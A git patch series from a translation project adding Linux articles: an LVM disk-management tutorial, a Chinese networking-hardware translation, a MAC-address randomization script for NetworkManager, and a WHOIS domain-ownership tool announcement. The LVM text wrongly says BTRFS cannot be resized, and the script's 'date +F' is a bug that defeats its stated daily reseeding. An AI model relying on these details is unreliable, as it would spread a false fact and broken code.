+Managing disk space has always been a significant task for sysadmins. Running out of disk space used to be the start of a long and complex series of tasks to increase the space available to a disk partition. It also required taking the system off-line. This usually involved installing a new hard drive, booting to recovery or single-user mode, creating a partition and a filesystem on the new hard drive, using temporary mount points to move the data from the too-small filesystem to the new, larger one, changing the content of the /etc/fstab file to reflect the correct device name for the new partition, and rebooting to remount the new filesystem on the correct mount point. + +I have to tell you that, when LVM (Logical Volume Manager) first made its appearance in Fedora Linux, I resisted it rather strongly. My initial reaction was that I did not need this additional layer of abstraction between me and the hard drives. It turns out that I was wrong, and that logical volume management is very useful. + +LVM allows for very flexible disk space management. It provides features like the ability to add disk space to a logical volume and its filesystem while that filesystem is mounted and active and it allows for the collection of multiple physical hard drives and partitions into a single volume group which can then be divided into logical volumes. + +The volume manager also allows reducing the amount of disk space allocated to a logical volume, but there are a couple requirements. First, the volume must be unmounted. Second, the filesystem itself must be reduced in size before the volume on which it resides can be reduced. + +It is important to note that the filesystem itself must allow resizing for this feature to work. The EXT2, 3, and 4 filesystems all allow both offline (unmounted) and online (mounted) resizing when increasing the size of a filesystem, and offline resizing when reducing the size. You should check the details of the filesystems you intend to use in order to verify whether they can be resized at all and especially whether they can be resized while online. + +### Expanding a filesystem on the fly + +I always like to run new distributions in a VirtualBox virtual machine for a few days or weeks to ensure that I will not run into any devastating problems when I start installing it on my production machines. One morning a couple years ago I started installing a newly released version of Fedora in a virtual machine on my primary workstation. I thought that I had enough disk space allocated to the host filesystem in which the VM was being installed. I did not. About a third of the way through the installation I ran out of space on that filesystem. Fortunately, VirtualBox detected the out-of-space condition and paused the virtual machine, and even displayed an error message indicating the exact cause of the problem. + +Note that this problem was not due to the fact that the virtual disk was too small, it was rather the logical volume on the host computer that was running out of space so that the virtual disk belonging to the virtual machine did not have enough space to expand on the host's logical volume. + +Since most modern distributions use Logical Volume Management by default, and I had some free space available on the volume group, I was able to assign additional disk space to the appropriate logical volume and then expand filesystem of the host on the fly. This means that I did not have to reformat the entire hard drive and reinstall the operating system or even reboot. I simply assigned some of the available space to the appropriate logical volume and resized the filesystem—all while the filesystem was on-line and the running program, The virtual machine was still using the host filesystem. After resizing the logical volume and the filesystem I resumed running the virtual machine and the installation continued as if no problems had occurred. + +Although this type of problem may never have happened to you, running out of disk space while a critical program is running has happened to many people. And while many programs, especially Windows programs, are not as well written and resilient as VirtualBox, Linux Logical Volume Management made it possible to recover without losing any data and without having to restart the time-consuming installation. + +### LVM Structure + +The structure of a Logical Volume Manager disk environment is illustrated by Figure 1, below. Logical Volume Management enables the combining of multiple individual hard drives and/or disk partitions into a single volume group (VG). That volume group can then be subdivided into logical volumes (LV) or used as a single large volume. Regular file systems, such as EXT3 or EXT4, can then be created on a logical volume. + +In Figure 1, two complete physical hard drives and one partition from a third hard drive have been combined into a single volume group. Two logical volumes have been created from the space in the volume group, and a filesystem, such as an EXT3 or EXT4 filesystem has been created on each of the two logical volumes. + +![lvm.png](https://opensource.com/sites/default/files/resize/images/life-uploads/lvm-520x222.png) + + _Figure 1: LVM allows combining partitions and entire hard drives into Volume Groups._ + +Adding disk space to a host is fairly straightforward but, in my experience, is done relatively infrequently. The basic steps needed are listed below. You can either create an entirely new volume group or you can add the new space to an existing volume group and either expand an existing logical volume or create a new one. + +### Adding a new logical volume + +There are times when it is necessary to add a new logical volume to a host. For example, after noticing that the directory containing virtual disks for my VirtualBox virtual machines was filling up the /home filesystem, I decided to create a new logical volume in which to store the virtual machine data, including the virtual disks. This would free up a great deal of space in my /home filesystem and also allow me to manage the disk space for the VMs independently. + +The basic steps for adding a new logical volume are as follows. + +1. If necessary, install a new hard drive. + +2. Optional: Create a partition on the hard drive. + +3. Create a physical volume (PV) of the complete hard drive or a partition on the hard drive. + +4. Assign the new physical volume to an existing volume group (VG) or create a new volume group. + +5. Create a new logical volumes (LV) from the space in the volume group. + +6. Create a filesystem on the new logical volume. + +7. Add appropriate entries to /etc/fstab for mounting the filesystem. + +8. Mount the filesystem. + +Now for the details. The following sequence is taken from an example I used as a lab project when teaching about Linux filesystems. + +### Example + +This example shows how to use the CLI to extend an existing volume group to add more space to it, create a new logical volume in that space, and create a filesystem on the logical volume. This procedure can be performed on a running, mounted filesystem. + +WARNING: Only the EXT3 and EXT4 filesystems can be resized on the fly on a running, mounted filesystem. Many other filesystems including BTRFS and ZFS cannot be resized. + +### Install hard drive + +If there is not enough space in the volume group on the existing hard drive(s) in the system to add the desired amount of space it may be necessary to add a new hard drive and create the space to add to the Logical Volume. First, install the physical hard drive, and then perform the following steps. + +### Create Physical Volume from hard drive + +It is first necessary to create a new Physical Volume (PV). Use the command below, which assumes that the new hard drive is assigned as /dev/hdd. + +``` +pvcreate /dev/hdd +``` + +It is not necessary to create a partition of any kind on the new hard drive. This creation of the Physical Volume which will be recognized by the Logical Volume Manager can be performed on a newly installed raw disk or on a Linux partition of type 83\. If you are going to use the entire hard drive, creating a partition first does not offer any particular advantages and uses disk space for metadata that could otherwise be used as part of the PV. + +### Extend the existing Volume Group + +In this example we will extend an existing volume group rather than creating a new one; you can choose to do it either way. After the Physical Volume has been created, extend the existing Volume Group (VG) to include the space on the new PV. In this example the existing Volume Group is named MyVG01. + +``` +vgextend /dev/MyVG01 /dev/hdd +``` + +### Create the Logical Volume + +First create the Logical Volume (LV) from existing free space within the Volume Group. The command below creates a LV with a size of 50GB. The Volume Group name is MyVG01 and the Logical Volume Name is Stuff. + +``` +lvcreate -L +50G --name Stuff MyVG01 +``` + +### Create the filesystem + +Creating the Logical Volume does not create the filesystem. That task must be performed separately. The command below creates an EXT4 filesystem that fits the newly created Logical Volume. + +``` +mkfs -t ext4 /dev/MyVG01/Stuff +``` + +### Add a filesystem label + +Adding a filesystem label makes it easy to identify the filesystem later in case of a crash or other disk related problems. + +``` +e2label /dev/MyVG01/Stuff Stuff +``` + +### Mount the filesystem + +At this point you can create a mount point, add an appropriate entry to the /etc/fstab file, and mount the filesystem. + +You should also check to verify the volume has been created correctly. You can use the **df**, **lvs,** and **vgs** commands to do this. + +### Resizing a logical volume in an LVM filesystem + +The need to resize a filesystem has been around since the beginning of the first versions of Unix and has not gone away with Linux. It has gotten easier, however, with Logical Volume Management. + +1. If necessary, install a new hard drive. + +2. Optional: Create a partition on the hard drive. + +3. Create a physical volume (PV) of the complete hard drive or a partition on the hard drive. + +4. Assign the new physical volume to an existing volume group (VG) or create a new volume group. + +5. Create one or more logical volumes (LV) from the space in the volume group, or expand an existing logical volume with some or all of the new space in the volume group. + +6. If you created a new logical volume, create a filesystem on it. If adding space to an existing logical volume, use the resize2fs command to enlarge the filesystem to fill the space in the logical volume. + +7. Add appropriate entries to /etc/fstab for mounting the filesystem. + +8. Mount the filesystem. + +### Example + +This example describes how to resize an existing Logical Volume in an LVM environment using the CLI. It adds about 50GB of space to the /Stuff filesystem. This procedure can be used on a mounted, live filesystem only with the Linux 2.6 Kernel (and higher) and EXT3 and EXT4 filesystems. I do not recommend that you do so on any critical system, but it can be done and I have done so many times; even on the root (/) filesystem. Use your judgment. + +WARNING: Only the EXT3 and EXT4 filesystems can be resized on the fly on a running, mounted filesystem. Many other filesystems including BTRFS and ZFS cannot be resized. + +### Install the hard drive + +If there is not enough space on the existing hard drive(s) in the system to add the desired amount of space it may be necessary to add a new hard drive and create the space to add to the Logical Volume. First, install the physical hard drive and then perform the following steps. + +### Create a Physical Volume from the hard drive + +It is first necessary to create a new Physical Volume (PV). Use the command below, which assumes that the new hard drive is assigned as /dev/hdd. + +``` +pvcreate /dev/hdd +``` + +It is not necessary to create a partition of any kind on the new hard drive. This creation of the Physical Volume which will be recognized by the Logical Volume Manager can be performed on a newly installed raw disk or on a Linux partition of type 83\. If you are going to use the entire hard drive, creating a partition first does not offer any particular advantages and uses disk space for metadata that could otherwise be used as part of the PV. + +### Add PV to existing Volume Group + +For this example, we will use the new PV to extend an existing Volume Group. After the Physical Volume has been created, extend the existing Volume Group (VG) to include the space on the new PV. In this example, the existing Volume Group is named MyVG01. + +``` +vgextend /dev/MyVG01 /dev/hdd +``` + +### Extend the Logical Volume + +Extend the Logical Volume (LV) from existing free space within the Volume Group. The command below expands the LV by 50GB. The Volume Group name is MyVG01 and the Logical Volume Name is Stuff. + +``` +lvextend -L +50G /dev/MyVG01/Stuff +``` + +### Expand the filesystem + +Extending the Logical Volume will also expand the filesystem if you use the -r option. If you do not use the -r option, that task must be performed separately. The command below resizes the filesystem to fit the newly resized Logical Volume. + +``` +resize2fs /dev/MyVG01/Stuff +``` + +You should check to verify the resizing has been performed correctly. You can use the **df**, **lvs,** and **vgs** commands to do this. + +### Tips + +Over the years I have learned a few things that can make logical volume management even easier than it already is. Hopefully these tips can prove of some value to you. + +* Use the Extended file systems unless you have a clear reason to use another filesystem. Not all filesystems support resizing but EXT2, 3, and 4 do. The EXT filesystems are also very fast and efficient. In any event, they can be tuned by a knowledgeable sysadmin to meet the needs of most environments if the defaults tuning parameters do not. + +* Use meaningful volume and volume group names. + +* Use EXT filesystem labels. + +I know that, like me, many sysadmins have resisted the change to Logical Volume Management. I hope that this article will encourage you to at least try LVM. I am really glad that I did; my disk management tasks are much easier since I made the switch. + + +### About the author + + [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/david-crop.jpg?itok=oePpOpyV)][10] + + David Both - David Both is a Linux and Open Source advocate who resides in Raleigh, North Carolina. He has been in the IT industry for over forty years and taught OS/2 for IBM where he worked for over 20 years. While at IBM, he wrote the first training course for the original IBM PC in 1981\. He has taught RHCE classes for Red Hat and has worked at MCI Worldcom, Cisco, and the State of North Carolina. He has been working with Linux and Open Source Software for almost 20 years. David has written articles for... [more about David Both][7][More about me][8] + +-------------------------------------------------------------------------------- + +via: https://opensource.com/business/16/9/linux-users-guide-lvm + +作者:[ David Both][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/dboth +[1]:https://opensource.com/resources/what-is-linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[2]:https://opensource.com/resources/what-are-linux-containers?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[3]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[4]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[5]:https://opensource.com/tags/linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[6]:https://opensource.com/business/16/9/linux-users-guide-lvm?rate=79vf1js7A7rlp-I96YFneopUQqsa2SuB-g-og7eiF1U +[7]:https://opensource.com/users/dboth +[8]:https://opensource.com/users/dboth +[9]:https://opensource.com/user/14106/feed +[10]:https://opensource.com/users/dboth +[11]:https://opensource.com/users/dboth +[12]:https://opensource.com/users/dboth +[13]:https://opensource.com/business/16/9/linux-users-guide-lvm#comments +[14]:https://opensource.com/tags/business +[15]:https://opensource.com/tags/linux +[16]:https://opensource.com/tags/how-tos-and-tutorials +[17]:https://opensource.com/tags/sysadmin From 3822959a7a40586f1e33861e0f9c2f7144a63eac Mon Sep 17 00:00:00 2001 From: FelixYFZ <33593534+FelixYFZ@users.noreply.github.com> Date: Sun, 3 Dec 2017 21:19:34 +0800 Subject: [PATCH 0199/1627] Create Linux Networking Hardware for Beginners: Think Software --- ...ing Hardware for Beginners: Think Software | 89 +++++++++++++++++++ 1 file changed, 89 insertions(+) create mode 100644 translated/tech/Linux Networking Hardware for Beginners: Think Software diff --git a/translated/tech/Linux Networking Hardware for Beginners: Think Software b/translated/tech/Linux Networking Hardware for Beginners: Think Software new file mode 100644 index 0000000000..a236a80e97 --- /dev/null +++ b/translated/tech/Linux Networking Hardware for Beginners: Think Software @@ -0,0 +1,89 @@ +Translating by FelixYFZ + +面向初学者的Linux网络硬件: 软件工程思想 +============================================================ + +![island network](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/soderskar-island.jpg?itok=wiMaF66b "island network") + 没有路由和桥接,我们将会成为孤独的小岛,你将会在这个网络教程中学到更多知识。 +Commons Zero][3]Pixabay + + 上周,我们学习了本地网络硬件知识,本周,我们将学习网络互联技术和在移动网络中的一些很酷的黑客技术。 +### Routers:路由器 + + +网络路由器就是计算机网络中的一切,因为路由器连接着网络,没有路由器,我们就会成为孤岛, + +图一展示了一个简单的有线本地网络和一个无线接入点,所有设备都接入到Internet上,本地局域网的计算机连接到一个连接着防火墙或者路由器的以太网交换机上,防火墙或者路由器连接到网络服务供应商提供的电缆箱,调制调节器,卫星上行系统...好像一切都在计算中,就像是一个带着不停闪烁的的小灯的盒子,当你的网络数据包离开你的局域网,进入广阔的互联网,它们穿过一个又一个路由器直到到达自己的目的地。 + + +### [fig-1.png][4] + +![simple LAN](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-1_7.png?itok=lsazmf3- "simple LAN") + +图一:一个简单的有线局域网和一个无线接入点。 + +一台路由器能连接一切,一个小巧特殊的小盒子只专注于路由,一个大点的盒子将会提供路由,防火墙,域名服务,以及VPN网关功能,一台重新设计的台式电脑或者笔记本,一个树莓派计算机或者一个小模块,体积臃肿矮小的像PC这样的单板计算机,除了苛刻的用途以外,普通的商品硬件都能良好的工作运行。高端的路由器使用特殊设计的硬件每秒能够传输最大量的数据包。 它们有多路数据总线,多个中央处理器和极快的存储。 +可以通过查阅Juniper和思科的路由器来感受一下高端路由器书什么样子的,而且能看看里面是什么样的构造。 +一个接入你的局域网的无线接入点要么作为一个以太网网桥要么作为一个路由器。一个桥接器扩展了这个网络,所以在这个桥接器上的任意一端口上的主机都连接在同一个网络中。 +一台路由器连接的是两个不同的网络。 +### Network Topology:网络拓扑 + + +有多种设置你的局域网的方式,你可以把所有主机接入到一个单独的平面网络,如果你的交换机支持的话,你也可以把它们分配到不同的子网中。 +平面网络是最简单的网络,只需把每一台设备接入到同一个交换机上即可,如果一台交换上的端口不够使用,你可以将更多的交换机连接在一起。 +有些交换机有特殊的上行端口,有些是没有这种特殊限制的上行端口,你可以连接其中的任意端口,你可能需要使用交叉类型的以太网线,所以你要查阅你的交换机的说明文档来设置。平面网络是最容易管理的,你不需要路由器也不需要计算子网,但它也有一些缺点。他们的伸缩性不好,所以当网络规模变得越来越大的时候就会被广播网络所阻塞。 +将你的局域网进行分段将会提升安全保障, 把局域网分成可管理的不同网段将有助于管理更大的网络。 + 图2展示了一个分成两个子网的局域网络:内部的有线和无线主机,和非军事区域(从来不知道所所有的工作上的男性术语都是在计算机上键入的?)因为他被阻挡了所有的内部网络的访问。 + + +### [fig-2.png][5] + +![LAN](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-2_4.png?itok=LpXq7bLf "LAN") + +图2:一个分成两个子网的简单局域网。 +即使像图2那样的小型网络也可以有不同的配置方法。你可以将防火墙和路由器放置在一台单独的设备上。 +你可以为你的非军事区域设置一个专用的网络连接,把它完全从你的内部网络隔离,这将引导我们进入下一个主题:一切基于软件。 + + +### Think Software软件思维 + + +你可能已经注意到在这个简短的系列中我们所讨论的硬件,只有网络接口,交换机,和线缆是特殊用途的硬件。 +其它的都是通用的商用硬件,而且都是软件来定义它的用途。 +网关,虚拟专用网关,以太网桥,网页,邮箱以及文件等等。 +服务器,负载均衡,代理,大量的服务,各种各样的认证,中继,故障转移...你可以在运行着Linux系统的标准硬件上运行你的整个网络。 +你甚至可以使用Linux交换应用和VDE2协议来模拟以太网交换机,像DD-WRT,openWRT 和Rashpberry Pi distros,这些小型的硬件都是有专业的分类的,要记住BSDS和它们的特殊衍生用途如防火墙,路由器,和网络附件存储。 +你知道有些人坚持认为硬件防火墙和软件防火墙有区别?其实是没有区别的,就像说有一台硬件计算机和一台软件计算机。 +### Port Trunking and Ethernet Bonding +端口聚合和以太网绑定 +聚合和绑定,也称链路聚合,是把两条以太网通道绑定在一起成为一条通道。一些交换机支持端口聚合,就是把两个交换机端口绑定在一起成为一个是他们原来带宽之和的一条新的连接。对于一台承载很多业务的服务器来说这是一个增加通道带宽的有效的方式。 +你也可以在以太网口进行同样的配置,而且绑定汇聚的驱动是内置在Linux内核中的,所以不需要任何其他的专门的硬件。 + + +### Bending Mobile Broadband to your Will随心所欲选择你的移动带宽 + +我期望移动带宽能够迅速增长来替代DSL和有线网络。我居住在一个有250,000人口的靠近一个城市的地方,但是在城市以外,要想接入互联网就要靠运气了,即使那里有很大的用户上网需求。我居住的小角落离城镇有20分钟的距离,但对于网络服务供应商来说他们几乎不会考虑到为这个地方提供网络。 我唯一的选择就是移动带宽; 这里没有拨号网络,卫星网络(即使它很糟糕)或者是DSL,电缆,光纤,但却没有阻止网络供应商把那些在我这个区域从没看到过的无限制通信个其他高速网络服务的传单塞进我的邮箱。 +我试用了AT&T,Version,和T-Mobile。Version的信号覆盖范围最广,但是Version和AT&T是最昂贵的。 +我居住的地方在T-Mobile信号覆盖的边缘,但迄今为止他们给了最大的优惠,为了能够能够有效的使用,我必须购买一个WeBoostDe信号放大器和 +一台中兴的移动热点设备。当然你也可以使用一部手机作为热点,但是专用的热点设备有着最强的信号。如果你正在考虑购买一台信号放大器,最好的选择就是WeBoost因为他们的服务支持最棒,而且他们会尽最大努力去帮助你。在一个小小的APP的协助下去设置将会精准的增强 你的网络信号,他们有一个功能较少的免费的版本,但你将一点都不会后悔去花两美元使用专业版。 +那个小巧的中兴热点设备能够支持15台主机而且还有拥有基本的防火墙功能。 但你如果你使用像 Linksys WRT54GL这样的设备,使用Tomato,openWRT,或者DD-WRT来替代普通的固件,这样你就能完全控制你的防护墙规则,路由配置,以及任何其他你想要设置的服务。 + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/learn/intro-to-linux/2017/10/linux-networking-hardware-beginners-think-software + +作者:[CARLA SCHRODER][a] +译者:[FelixYFZ](https://github.com/FelixYFZ) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/cschroder +[1]:https://www.linux.com/licenses/category/used-permission +[2]:https://www.linux.com/licenses/category/used-permission +[3]:https://www.linux.com/licenses/category/creative-commons-zero +[4]:https://www.linux.com/files/images/fig-1png-7 +[5]:https://www.linux.com/files/images/fig-2png-4 +[6]:https://www.linux.com/files/images/soderskar-islandjpg +[7]:https://www.linux.com/learn/intro-to-linux/2017/10/linux-networking-hardware-beginners-lan-hardware +[8]:http://www.bluelinepc.com/signalcheck/ From c5461dd8bb3457e1dca25237151b09e91385b917 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 22:02:08 +0800 Subject: [PATCH 0200/1627] =?UTF-8?q?20171203-31=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...e your WiFi MAC address on Ubuntu 16.04.md | 160 ++++++++++++++++++ 1 file changed, 160 insertions(+) create mode 100644 sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md diff --git a/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md b/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md new file mode 100644 index 0000000000..b0f8e72018 --- /dev/null +++ b/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md @@ -0,0 +1,160 @@ +Randomize your WiFi MAC address on Ubuntu 16.04 +============================================================ + + _Your device’s MAC address can be used to track you across the WiFi networks you connect to. That data can be shared and sold, and often identifies you as an individual. It’s possible to limit this tracking by using pseudo-random MAC addresses._ + +![A captive portal screen for a hotel allowing you to log in with social media for an hour of free WiFi](https://www.paulfurley.com/img/captive-portal-our-hotel.gif) + + _Image courtesy of [Cloudessa][4]_ + +Every network device like a WiFi or Ethernet card has a unique identifier called a MAC address, for example `b4:b6:76:31:8c:ff`. It’s how networking works: any time you connect to a WiFi network, the router uses that address to send and receive packets to your machine and distinguish it from other devices in the area. + +The snag with this design is that your unique, unchanging MAC address is just perfect for tracking you. Logged into Starbucks WiFi? Noted. London Underground? Logged. + +If you’ve ever put your real name into one of those Craptive Portals on a WiFi network you’ve now tied your identity to that MAC address. Didn’t read the terms and conditions? You might assume that free airport WiFi is subsidised by flogging ‘customer analytics’ (your personal information) to hotels, restaurant chains and whomever else wants to know about you. + +I don’t subscribe to being tracked and sold by mega-corps, so I spent a few hours hacking a solution. + +### MAC addresses don’t need to stay the same + +Fortunately, it’s possible to spoof your MAC address to a random one without fundamentally breaking networking. + +I wanted to randomize my MAC address, but with three particular caveats: + +1. The MAC should be different across different networks. This means Starbucks WiFi sees a different MAC from London Underground, preventing linking my identity across different providers. + +2. The MAC should change regularly to prevent a network knowing that I’m the same person who walked past 75 times over the last year. + +3. The MAC stays the same throughout each working day. When the MAC address changes, most networks will kick you off, and those with Craptive Portals will usually make you sign in again - annoying. + +### Manipulating NetworkManager + +My first attempt of using the `macchanger` tool was unsuccessful as NetworkManager would override the MAC address according to its own configuration. + +I learned that NetworkManager 1.4.1+ can do MAC address randomization right out the box. If you’re using Ubuntu 17.04 upwards, you can get most of the way with [this config file][7]. You can’t quite achieve all three of my requirements (you must choose  _random_ or  _stable_  but it seems you can’t do  _stable-for-one-day_ ). + +Since I’m sticking with Ubuntu 16.04 which ships with NetworkManager 1.2, I couldn’t make use of the new functionality. Supposedly there is some randomization support but I failed to actually make it work, so I scripted up a solution instead. + +Fortunately NetworkManager 1.2 does allow for spoofing your MAC address. You can see this in the ‘Edit connections’ dialog for a given network: + +![Screenshot of NetworkManager's edit connection dialog, showing a text entry for a cloned mac address](https://www.paulfurley.com/img/network-manager-cloned-mac-address.png) + +NetworkManager also supports hooks - any script placed in `/etc/NetworkManager/dispatcher.d/pre-up.d/` is run before a connection is brought up. + +### Assigning pseudo-random MAC addresses + +To recap, I wanted to generate random MAC addresses based on the  _network_  and the  _date_ . We can use the NetworkManager command line, nmcli, to show a full list of networks: + +``` +> nmcli connection +NAME UUID TYPE DEVICE +Gladstone Guest 618545ca-d81a-11e7-a2a4-271245e11a45 802-11-wireless wlp1s0 +DoESDinky 6e47c080-d81a-11e7-9921-87bc56777256 802-11-wireless -- +PublicWiFi 79282c10-d81a-11e7-87cb-6341829c2a54 802-11-wireless -- +virgintrainswifi 7d0c57de-d81a-11e7-9bae-5be89b161d22 802-11-wireless -- + +``` + +Since each network has a unique identifier, to achieve my scheme I just concatenated the UUID with today’s date and hashed the result: + +``` + +# eg 618545ca-d81a-11e7-a2a4-271245e11a45-2017-12-03 + +> echo -n "${UUID}-$(date +%F)" | md5sum + +53594de990e92f9b914a723208f22b3f - + +``` + +That produced bytes which can be substituted in for the last octets of the MAC address. + +Note that the first byte `02` signifies the address is [locally administered][8]. Real, burned-in MAC addresses start with 3 bytes designing their manufacturer, for example `b4:b6:76` for Intel. + +It’s possible that some routers may reject locally administered MACs but I haven’t encountered that yet. + +On every connection up, the script calls `nmcli` to set the spoofed MAC address for every connection: + +![A terminal window show a number of nmcli command line calls](https://www.paulfurley.com/img/terminal-window-nmcli-commands.png) + +As a final check, if I look at `ifconfig` I can see that the `HWaddr` is the spoofed one, not my real MAC address: + +``` +> ifconfig +wlp1s0 Link encap:Ethernet HWaddr b4:b6:76:45:64:4d + inet addr:192.168.0.86 Bcast:192.168.0.255 Mask:255.255.255.0 + inet6 addr: fe80::648c:aff2:9a9d:764/64 Scope:Link + UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 + RX packets:12107812 errors:0 dropped:2 overruns:0 frame:0 + TX packets:18332141 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:1000 + RX bytes:11627977017 (11.6 GB) TX bytes:20700627733 (20.7 GB) + +``` + +The full script is [available on Github][9]. + +``` +#!/bin/sh + +# /etc/NetworkManager/dispatcher.d/pre-up.d/randomize-mac-addresses + +# Configure every saved WiFi connection in NetworkManager with a spoofed MAC +# address, seeded from the UUID of the connection and the date eg: +# 'c31bbcc4-d6ad-11e7-9a5a-e7e1491a7e20-2017-11-20' + +# This makes your MAC impossible(?) to track across WiFi providers, and +# for one provider to track across days. + +# For craptive portals that authenticate based on MAC, you might want to +# automate logging in :) + +# Note that NetworkManager >= 1.4.1 (Ubuntu 17.04+) can do something similar +# automatically. + +export PATH=$PATH:/usr/bin:/bin + +LOG_FILE=/var/log/randomize-mac-addresses + +echo "$(date): $*" > ${LOG_FILE} + +WIFI_UUIDS=$(nmcli --fields type,uuid connection show |grep 802-11-wireless |cut '-d ' -f3) + +for UUID in ${WIFI_UUIDS} +do + UUID_DAILY_HASH=$(echo "${UUID}-$(date +F)" | md5sum) + + RANDOM_MAC="02:$(echo -n ${UUID_DAILY_HASH} | sed 's/^\(..\)\(..\)\(..\)\(..\)\(..\).*$/\1:\2:\3:\4:\5/')" + + CMD="nmcli connection modify ${UUID} wifi.cloned-mac-address ${RANDOM_MAC}" + + echo "$CMD" >> ${LOG_FILE} + $CMD & +done + +wait +``` +Enjoy! + + _Update: [Use locally administered MAC addresses][5] to avoid clashing with real Intel ones. Thanks [@_fink][6]_ + +-------------------------------------------------------------------------------- + +via: https://www.paulfurley.com/randomize-your-wifi-mac-address-on-ubuntu-1604-xenial/ + +作者:[Paul M Furley ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.paulfurley.com/ +[1]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f/raw/5f02fc8f6ff7fca5bca6ee4913c63bf6de15abca/randomize-mac-addresses +[2]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f#file-randomize-mac-addresses +[3]:https://github.com/ +[4]:http://cloudessa.com/products/cloudessa-aaa-and-captive-portal-cloud-service/ +[5]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f/revisions#diff-824d510864d58c07df01102a8f53faef +[6]:https://twitter.com/fink_/status/937305600005943296 +[7]:https://gist.github.com/paulfurley/978d4e2e0cceb41d67d017a668106c53/ +[8]:https://en.wikipedia.org/wiki/MAC_address#Universal_vs._local +[9]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f From 821ac6943b79d1470e585966c35dc10d64ed942f Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 22:03:51 +0800 Subject: [PATCH 0201/1627] =?UTF-8?q?20171203-32=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...every domain someone owns automatically.md | 49 +++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 sources/tech/20171130 New Feature Find every domain someone owns automatically.md diff --git a/sources/tech/20171130 New Feature Find every domain someone owns automatically.md b/sources/tech/20171130 New Feature Find every domain someone owns automatically.md new file mode 100644 index 0000000000..4b9fedf168 --- /dev/null +++ b/sources/tech/20171130 New Feature Find every domain someone owns automatically.md @@ -0,0 +1,49 @@ +New Feature: Find every domain someone owns automatically +============================================================ + + +Today, we are excited to announce our latest feature which we have been working on for the past weeks. It is the Whois aggregation tool that is now available on [DNSTrails][1]. + +In the past, searching for domain owners took lot of time, because most of the time you needed to have the domain names pointed to an IP address in order to find the rest of the domains owned by the same person. + +Using that old method you could easily lose hours and hours each day by researching and crossing results and data between one tool and another until you got the domain list you wanted. + +Thanks to this new tool and our intelligent [WHOIS database][2], now you can search for any domain name and get the full list of domains registered by that organization or person and get accurate results within seconds. + +### How can I use the Whois aggregation feature? + +Step 1: Open up [DNSTrails.com][3] + +Step 2: Search for any domain name, for example: godaddy.com + +Step 3: After you get the results for the domain name, locate the Whois information block as you see below: + +![Domain name search results](https://securitytrails.com/images/a/a/1/3/f/aa13fa3616b8dc313f925bdbf1da43a54856d463-image1.png) + +Step 4: You will notice there is a phone number and email address associated with the domain name. + +Step 5: Click on the links at the right, you will easily find the rest of the domain names registered with the same telephone and email address. + +![All domain names by the same owner](https://securitytrails.com/images/1/3/4/0/3/134037822d23db4907d421046b11f3cbb872f94f-image2.png) + +This means, that even if the domains doesn't even have IPs pointed at the registrar, we can still discover the rest of the domains if they use the same phone and mail address, pretty useful if you are investigating domain ownership from any individual on the Internet. + +Ever wanted to know which other domains are owned by a person? Try the [WHOIS aggregation feature][4] at [DNStrails][5] yourself or [get in touch with us for API access][6]. + +-------------------------------------------------------------------------------- + +via: https://securitytrails.com/blog/find-every-domain-someone-owns + +作者:[SECURITYTRAILS TEAM ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://securitytrails.com/blog/find-every-domain-someone-owns +[1]:https://dnstrails.com/ +[2]:https://securitytrails.com/forensics +[3]:https://dnstrails.com/ +[4]:http://dnstrails.com/#/domain/domain/ueland.com +[5]:https://dnstrails.com/ +[6]:https://securitytrails.com/contact From 63cd31f06f6f91c6f2cf55c3869dadeb0f5ca5a9 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 22:08:49 +0800 Subject: [PATCH 0202/1627] =?UTF-8?q?20171203-33=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...6 Introducing security alerts on GitHub.md | 48 